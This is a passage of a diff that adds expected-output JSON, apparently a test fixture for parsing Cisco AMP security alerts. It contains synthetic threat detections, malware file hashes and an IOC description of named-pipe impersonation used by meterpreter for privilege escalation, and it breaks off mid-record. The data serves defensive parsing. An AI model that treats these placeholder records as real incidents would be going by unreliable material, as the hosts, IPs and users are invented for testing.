+                    "location": {
+                        "lon": -97.822,
+                        "lat": 37.751
+                    },
+                    "country_iso_code": "US"
+                },
+                "as": {
+                    "number": 15169,
+                    "organization": {
+                        "name": "Google LLC"
+                    }
+                },
+                "port": 443,
+                "ip": "8.8.4.4"
+            },
+            "source": {
+                "port": 55805,
+                "ip": "10.10.0.0"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "network": {
+                "transport": "TCP",
+                "direction": "egress"
+            },
+            "@timestamp": "2021-01-15T10:37:43.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "ip": [
+                    "10.10.0.0",
+                    "8.8.4.4",
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Upatre"
+            },
+            "event": {
+                "severity": 3,
+                "action": "DFC Threat Detected",
+                "ingested": "2021-09-12T17:31:04.469624731Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "id": "6180341055704007000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "DFC.CustomIPList",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180341055704006657",
+                    "event_type_id": 1090519084,
+                    "network_info": {
+                        "nfm": {
+                            "direction": "Outgoing connection from"
+                        },
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        }
+                    }
+                }
+            }
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 3136,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "destination": {
+                "geo": {
+                    "continent_name": "North America",
+                    "country_name": "United States",
+                    "location": {
+                        "lon": -97.822,
+                        "lat": 37.751
+                    },
+                    "country_iso_code": "US"
+                },
+                "as": {
+                    "number": 15169,
+                    "organization": {
+                        "name": "Google LLC"
+                    }
+                },
+                "port": 443,
+                "ip": "8.8.4.4"
+            },
+            "source": {
+                "port": 55809,
+                "ip": "10.10.0.0"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "network": {
+                "transport": "TCP",
+                "direction": "egress"
+            },
+            "@timestamp": "2021-01-15T10:37:43.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "ip": [
+                    "10.10.0.0",
+                    "8.8.4.4",
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Upatre"
+            },
+            "event": {
+                "severity": 3,
+                "action": "DFC Threat Detected",
+                "ingested": "2021-09-12T17:31:04.469626640Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "id": "6180341055704007000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "DFC.CustomIPList",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180341055704006661",
+                    "event_type_id": 1090519084,
+                    "network_info": {
+                        "nfm": {
+                            "direction": "Outgoing connection from"
+                        },
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        }
+                    }
+                }
+            }
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 3136,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "destination": {
+                "geo": {
+                    "continent_name": "North America",
+                    "country_name": "United States",
+                    "location": {
+                        "lon": -97.822,
+                        "lat": 37.751
+                    },
+                    "country_iso_code": "US"
+                },
+                "as": {
+                    "number": 15169,
+                    "organization": {
+                        "name": "Google LLC"
+                    }
+                },
+                "port": 443,
+                "ip": "8.8.4.4"
+            },
+            "source": {
+                "port": 55808,
+                "ip": "10.10.0.0"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "network": {
+                "transport": "TCP",
+                "direction": "egress"
+            },
+            "@timestamp": "2021-01-15T10:37:43.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "ip": [
+                    "10.10.0.0",
+                    "8.8.4.4",
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Upatre"
+            },
+            "event": {
+                "severity": 3,
+                "action": "DFC Threat Detected",
+                "ingested": "2021-09-12T17:31:04.469628547Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "id": "6180341055704007000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "DFC.CustomIPList",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180341055704006660",
+                    "event_type_id": 1090519084,
+                    "network_info": {
+                        "nfm": {
+                            "direction": "Outgoing connection from"
+                        },
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        }
+                    }
+                }
+            }
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 3136,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "destination": {
+                "geo": {
+                    "continent_name": "North America",
+                    "country_name": "United States",
+                    "location": {
+                        "lon": -97.822,
+                        "lat": 37.751
+                    },
+                    "country_iso_code": "US"
+                },
+                "as": {
+                    "number": 15169,
+                    "organization": {
+                        "name": "Google LLC"
+                    }
+                },
+                "port": 443,
+                "ip": "8.8.4.4"
+            },
+            "source": {
+                "port": 55807,
+                "ip": "10.10.0.0"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "network": {
+                "transport": "TCP",
+                "direction": "egress"
+            },
+            "@timestamp": "2021-01-15T10:37:43.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "ip": [
+                    "10.10.0.0",
+                    "8.8.4.4",
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Upatre"
+            },
+            "event": {
+                "severity": 3,
+                "action": "DFC Threat Detected",
+                "ingested": "2021-09-12T17:31:04.469630455Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "id": "6180341055704007000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "DFC.CustomIPList",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180341055704006659",
+                    "event_type_id": 1090519084,
+                    "network_info": {
+                        "nfm": {
+                            "direction": "Outgoing connection from"
+                        },
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        }
+                    }
+                }
+            }
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 3136,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "destination": {
+                "geo": {
+                    "continent_name": "North America",
+                    "country_name": "United States",
+                    "location": {
+                        "lon": -97.822,
+                        "lat": 37.751
+                    },
+                    "country_iso_code": "US"
+                },
+                "as": {
+                    "number": 15169,
+                    "organization": {
+                        "name": "Google LLC"
+                    }
+                },
+                "port": 443,
+                "ip": "8.8.4.4"
+            },
+            "source": {
+                "port": 55806,
+                "ip": "10.10.0.0"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "network": {
+                "transport": "TCP",
+                "direction": "egress"
+            },
+            "@timestamp": "2021-01-15T10:37:43.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "ip": [
+                    "10.10.0.0",
+                    "8.8.4.4",
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Upatre"
+            },
+            "event": {
+                "severity": 3,
+                "action": "DFC Threat Detected",
+                "ingested": "2021-09-12T17:31:04.469632385Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "id": "6180341055704007000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "DFC.CustomIPList",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180341055704006658",
+                    "event_type_id": 1090519084,
+                    "network_info": {
+                        "nfm": {
+                            "direction": "Outgoing connection from"
+                        },
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        }
+                    }
+                }
+            }
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"
+                }
+            },
+            "@timestamp": "2021-01-15T10:32:58.000Z",
+            "file": {
+                "name": "cmd.exe",
+                "path": "/C:/WINDOWS/system32/cmd.exe",
+                "hash": {
+                    "sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Command_Line_Arguments_Meterpreter"
+                ],
+                "hash": [
+                    "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Command_Line_Arguments_Meterpreter",
+                "hostname": "Demo_Command_Line_Arguments_Meterpreter"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:04.469634316Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-15T10:32:58.000Z",
+                "action": "Cloud IOC",
+                "id": "1476910664322001000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "27:85:29:21:67:49",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "27:85:29:21:67:49"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PossibleNamedPipeImpersonation.ioc",
+                        "description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:27:39.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469636399Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533671385032557000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533671385032556606",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"
+                }
+            },
+            "@timestamp": "2021-01-15T10:24:58.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:04.469638309Z",
